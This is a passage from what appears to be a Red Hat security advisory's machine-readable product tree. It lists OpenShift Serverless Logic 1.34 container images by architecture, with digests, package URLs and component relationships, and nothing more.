"openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", product: { name: "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", product_id: "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", product_identification_helper: { purl: "pkg:oci/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-operator-bundle&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", product: { name: "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", product_id: "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", product_identification_helper: { purl: "pkg:oci/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-rhel8-operator&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", product: { name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", product_id: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", product_identification_helper: { purl: "pkg:oci/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-builder-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", product: { name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", product_id: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", product_identification_helper: { purl: "pkg:oci/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-devmode-rhel8&tag=1.34.0-6", }, }, }, ], category: "architecture", name: "amd64", }, { branches: [ { category: "product_version", name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", product: { name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", product_id: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", product_identification_helper: { purl: "pkg:oci/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-ephemeral-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", product: { name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", product_id: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", product_identification_helper: { purl: "pkg:oci/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-postgresql-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", product: { name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", product_id: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", product_identification_helper: { purl: "pkg:oci/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-ephemeral-rhel8&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", product: { name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", product_id: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", product_identification_helper: { purl: "pkg:oci/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-postgresql-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", product: { name: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", product_id: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", product_identification_helper: { purl: "pkg:oci/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8&tag=1.34.0-2", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", product: { name: "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", product_id: "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", product_identification_helper: { purl: "pkg:oci/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-operator-bundle&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", product: { name: "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", product_id: "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", product_identification_helper: { purl: "pkg:oci/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-rhel8-operator&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", product: { name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", product_id: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", product_identification_helper: { purl: "pkg:oci/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-builder-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", product: { name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", product_id: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", product_identification_helper: { purl: "pkg:oci/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-devmode-rhel8&tag=1.34.0-6", }, }, }, ], category: "architecture", name: "arm64", }, { branches: [ { category: "product_version", name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", product: { name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", product_id: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-ephemeral-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", product: { name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", product_id: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-postgresql-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", product: { name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", product_id: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-ephemeral-rhel8&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", product: { name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", product_id: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-postgresql-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", product: { name: "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", product_id: "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-operator-bundle&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", product: { name: "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", product_id: "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-rhel8-operator&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", product: { name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", product_id: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-builder-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", product: { name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", product_id: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-devmode-rhel8&tag=1.34.0-6", }, }, }, ], category: "architecture", name: "ppc64le", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", }, product_reference: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", }, product_reference: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", }, product_reference: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", }, product_reference: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", }, product_reference: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", }, product_reference: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", }, product_reference: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", }, product_reference: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", }, product_reference: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", }, product_reference: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", }, product_reference: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", }, product_reference: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", }, product_reference: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", }, product_reference: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", }, product_reference: "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", }, product_reference: "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", }, product_reference: "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", }, product_reference: "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", }, product_reference: "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: 